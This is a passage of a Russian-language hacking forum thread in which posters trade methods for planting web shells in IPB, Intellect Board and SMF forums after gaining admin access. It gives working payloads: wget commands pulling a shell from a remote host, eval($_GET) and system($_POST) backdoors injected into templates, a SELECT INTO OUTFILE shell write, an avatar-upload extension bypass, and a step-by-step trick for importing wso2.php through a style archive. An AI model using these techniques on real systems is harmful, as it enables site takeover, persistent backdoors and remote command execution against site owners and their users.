Старый 03.07.2011, 20:07   #21
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 144
Репутация: 25
По умолчанию

Тут приводить то, по сути, нечего. Простейший POST-запрос и обработка полученного текста. Основной код должен быть примерно такой:
Цитата:
$ch = curl_init();

curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"cmd=$cmd");

$result = curl_exec($ch);

curl_close($ch);
// Далее код извлечения из общей каши в $result результата работы команды
Белый Тигр вне форума   Ответить с цитированием
Старый 06.07.2011, 22:41   #22
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от Белый Тигр Посмотреть сообщение
Тут приводить то, по сути, нечего. Простейший POST-запрос и обработка полученного текста. Основной код должен быть примерно такой:
Если кто то ещё не поймет, проще будет сделать вот так
Код:
http://site/forum/index.php?testKey=123&code=wget -O sss.php http://сайт_где_лежит_шелл/шелл.txt
z0mbie вне форума   Ответить с цитированием
Старый 06.07.2011, 23:05   #23
napas_hd
 
Регистрация: 09.07.2010
Сообщений: 70
Репутация: 4
По умолчанию

z0mbie, да, только вот так system("wget -O sss.php http://сайт_где_лежит_шелл/шелл.txt"), например.
napas_hd вне форума   Ответить с цитированием
Старый 07.07.2011, 00:17   #24
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

На одном форуме у меня выходили ошибки кавычек и енд,все вышенаписаное не помогало,я воспользовался вот этим:
print(`wget%20-O%20sss.php%20http://ссылка_на_шелл/шелл.txt;ls%20-ls`);exit;
z0mbie вне форума   Ответить с цитированием
Старый 07.07.2011, 09:32   #25
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
На одном форуме у меня выходили ошибки кавычек и енд,все вышенаписаное не помогало,я воспользовался вот этим:
print(`wget%20-O%20sss.php%20http://ссылка_на_шелл/шелл.txt;ls%20-ls`);exit;
Проще всего использовать eval(base64_decode(...)) и кавычки и все остальное идет лесом.
З.Ы. если будут траблы из-за "=" или "==" в конце закодированной в base64 команды, то можете смело их отбрасывать, они не играют никакой роли, а используются лишь для дополнения длины.
Twost вне форума   Ответить с цитированием
Старый 17.08.2011, 18:16   #26
vaccine
 
Аватар для vaccine
 
Регистрация: 08.12.2010
Сообщений: 130
Репутация: 88
По умолчанию

Цитата:
Сообщение от Белый Тигр Посмотреть сообщение
IPB 2.* (возможно и на 3 покатит, не проверял)
Нашёл в процессе пыток одного форума (версия 2.3.6). Все перчисленные здесь варианты я пробовал, но они обламывались следующим:
1. На сервере как php-скрипты опознавались только .php-файлы. То есть заливка через фото phtml/php3/php5/и т.д.-файлов не помогала.
2. У меня были права обычного администратора, а не главного. Так что я не мог работать с SQL-инструментарием и вбивать PHP-код в настройки форума.
И на помощь вдруг пришли шаблоны Вообщем заходим в редактирование текущего дизайна (или любого, если пользователи сами могут выбирать себе внешний вид), выбираем любой шаблон. Я выбрал skin_global/global_header. В него пишем следующее:

Я поместил это сразу после

После сохранения шаблона, в кеш-файле данный код превращается в

Теперь обращаемся например вот так -
/index.php?testKey=123&code=phpinfo();
Видим phpinfo. После этого можно смело писать эксплоит который в code POST-методом будет пересылать код шелла.
Плюс метода в том, что он не создаёт лишних файлов.
Минус - дизайн отмечается как изменённый. Хотя если он уже изменялся владельцами и имеет такую отметку, то можно не беспокоиться.
у меня на 3.1*
работает так: {${phpinfo()}}
выбрал как вариант темпл "membres"

{${system($_POST[rd0t])}}
http://www.site.com/forum/members/
POST: rd0t=id

Последний раз редактировалось vaccine; 17.08.2011 в 18:19..
vaccine вне форума   Ответить с цитированием
Старый 10.10.2011, 21:32   #27
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию Intellect Board 2.22

Intellect Board 2.22 (возможно, более ранние версии) Какая-то пародия на phpbb, ей-богу

Условие - доступ в админку (http://forum/admin) + пароль пользователя System.
1) В разделе интерфейс => редактор стилей => редактировать шаблон (для Grey (wsx)).
http://forum/admin/index.php?m=styles&a=st_edit_template&style=wsx

В начале файла вписываем
PHP код:
<?php eval($_GET['e']); ?>
Сохраняем, используем здесь

http://forum/styles/wsx/template.php?e=phpinfo();

2) через обычный sql-запрос (file_priv=Y)
http://forum/admin/index.php?m=basic&a=sql_query

PHP код:
SELECT '<?php eval($_GET['e']); ?>' INTO OUTFILE 'абсолютный_путь_на_сервере/forum/evil.php';
http://forum/evil.php?e=phpinfo();


Собственно, ничего сверхестественного, но для коллекции пойдет.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 04.12.2011, 15:46   #28
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл:
Код:
http://site.com/uploads/shell.php
PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:
http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:
http://site.ru/uploads/av-1.php3
=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
появится

Код:
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2
где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

Код:
http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку
v2.3.6

Сработал вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:
http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:
http://site.ru/uploads/av-1.php3
}{оттабыч вне форума   Ответить с цитированием
Старый 19.01.2012, 19:35   #29
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Заливка шелла IPB 3.x
Вроде такого не было:
1) Идем в админку => Внешний вид => IP.Board(текущий шаблон) => globalTemplate
2) Ставим код между тегами <php> и </php> и жмем Сохранить.
3) Ваш код доступен по адрес http://site/forum/index.php
---
2kingbeef, сохрани код в faq_complete, тогда код будет по адресу http://site/forum/faq.php. Если ты про адрес шелла, то возможно нет прав на запись. Попробуй другие папки, avatars к примеру.
Ereeee вне форума   Ответить с цитированием
Старый 04.02.2012, 15:24   #30
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

SMF 1.1.4 через изменения шаблонов (возможно и на более ранних, так и на более поздних версиях)
нужны права администратора.
  1. заходим в «темы оформления»
  2. «изменения тем оформления»
  3. выбираем любую тему оформления, «обзор шаблонов и файлов этой темы оформления»
  4. и редактируем, например index.template.php
  5. профит, наш шелл в индексе
только не забудьте выбрать тему, которую вы изменяли, в настройках.
faza02 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot